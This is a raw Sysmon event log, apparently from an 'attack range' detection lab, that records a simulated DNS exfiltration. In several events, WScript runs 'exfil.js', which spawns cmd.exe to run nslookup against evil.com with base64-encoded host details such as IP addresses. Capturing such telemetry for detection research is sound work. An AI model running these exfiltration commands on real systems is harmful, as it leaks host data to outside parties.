14:16:47.179{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CF-629A-3742-000000005F02}4288C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.179{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CF-629A-3742-000000005F02}4288C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.163{2E1864BB-17CF-629A-3742-000000005F02}42883872C:\Windows\system32\conhost.exe{2E1864BB-17CF-629A-3642-000000005F02}7880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.163{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-3742-000000005F02}4288C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.142{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.142{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.142{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.142{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-3642-000000005F02}7880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.142{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.142{2E1864BB-17A1-629A-783D-000000005F02}55526616C:\Windows\System32\WScript.exe{2E1864BB-17CF-629A-3642-000000005F02}7880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.154{2E1864BB-17CF-629A-3642-000000005F02}7880C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhrunub.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.142{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyxeyqh.tmpMD5=E9933BFC1563034EF92711FFD1FA59E4,SHA256=B289486696E542D49274648AF69BCDC051FA9206A6157EC32F57F8442A56EBEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.110{2E1864BB-17CF-629A-3442-000000005F02}6842848C:\Windows\system32\conhost.exe{2E1864BB-17CF-629A-3542-000000005F02}2256C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.110{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.110{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.110{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.095{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.095{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-3542-000000005F02}2256C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.095{2E1864BB-17CF-629A-3342-000000005F02}70087044C:\Windows\system32\cmd.exe{2E1864BB-17CF-629A-3542-000000005F02}2256C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.109{2E1864BB-17CF-629A-3542-000000005F02}2256C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CF-629A-3342-000000005F02}7008C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyxeyqh.tmp 2>&1 10341000x8000000000000000204763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.079{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CF-629A-3442-000000005F02}684C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.079{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CF-629A-3442-000000005F02}684C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.064{2E1864BB-17CF-629A-3442-000000005F02}6842848C:\Windows\system32\conhost.exe{2E1864BB-17CF-629A-3342-000000005F02}7008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.061{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-3442-000000005F02}684C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.041{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.041{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.041{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.041{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.041{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CF-629A-3342-000000005F02}7008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.041{2E1864BB-17A1-629A-783D-000000005F02}55525544C:\Windows\System32\WScript.exe{2E1864BB-17CF-629A-3342-000000005F02}7008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.054{2E1864BB-17CF-629A-3342-000000005F02}7008C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyxeyqh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.026{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldtwi.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 